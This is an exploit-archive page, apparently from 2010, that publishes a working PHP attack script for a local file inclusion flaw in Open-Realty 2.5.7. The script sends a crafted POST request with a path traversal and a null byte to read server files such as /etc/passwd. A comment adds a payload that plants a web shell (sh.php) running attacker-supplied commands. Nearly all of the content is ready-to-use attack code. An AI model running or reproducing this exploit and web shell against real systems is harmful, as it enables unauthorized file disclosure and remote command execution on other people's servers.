Open-Realty 2.5.7 Local File Disclosure Vulnerability

Posted on 18 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Open-Realty 2.5.7 Local File Disclosure Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=====================================================
Open-Realty 2.5.7 Local File Disclosure Vulnerability
=====================================================

&lt;?php
/*
 * Exploit Title:
 * Date: 2010-08-18
 * Author: Nikola Petrov
 * Vendor: http://open-realty.org/
 * Version: 2.5.7
 */
    /*
        vulnerable: Open-Realty 2.5.7
        LFI: /index.php
         
        upload image with: &lt;?php system(&quot;echo &quot;&lt;?php if(isset($_GET[&quot;cmd&quot;])) system($_GET[&quot;cmd&quot;]); ?&gt;&quot; &gt; sh.php&quot;); ?&gt;
        include the image and sh.php will be generated.
        proceed with sh.php
 
        MAGIC_QUOTES must be 'off' and %00 must not be replaced with .
    */
 
    print &quot;

#########################################################################
&quot;;
    print &quot;#LFI discovery and implementation: Nikola Petrov (vp.nikola@gmail.com)
&quot;;
    print &quot;#Date: 05.09.2009
&quot;;
    print &quot;#########################################################################

&quot;;
 
    if($argc &lt; 5) {
        print &quot;usage: $argv[0] host port path file [debug: 1/0]
&quot;;
        print &quot;example: $argv[0] localhost 80 / ../../../../../../../../../../../../etc/passwd


&quot;;
        exit();
    }
 
    $Host = $argv[1];
    $Port = $argv[2];
    $Path = $argv[3];
    $File = $argv[4];
 
    function HttpSend($aHost, $aPort, $aPacket) {
        $Response = &quot;&quot;;
 
        if(!$Socket = fsockopen($aHost, $aPort)) {
            print &quot;Error connecting to $aHost:$aPort

&quot;;
            exit();
        }
         
        fputs($Socket, $aPacket);
         
        while(!feof($Socket)) $Response .= fread($Socket, 1024);
         
        fclose($Socket);
         
        return $Response;
    }
 
    $VulnRequest = &quot;select_users_lang=&quot;. $File . &quot;%00&quot;;
     
    $Packet  = &quot;POST {$Path} HTTP/1.1
&quot;;
    $Packet .= &quot;Host: {$Host}
&quot;;
    $Packet .= &quot;Content-Type: application/x-www-form-urlencoded
&quot;;
    $Packet .= &quot;Content-Length: &quot; . strlen($VulnRequest) . &quot;

&quot;;
    $Packet .= &quot;$VulnRequest
&quot;;
 
    if($argv[5] == 1) print $Packet;
 
    print HttpSend($Host, $Port, $Packet);
?&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-18]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20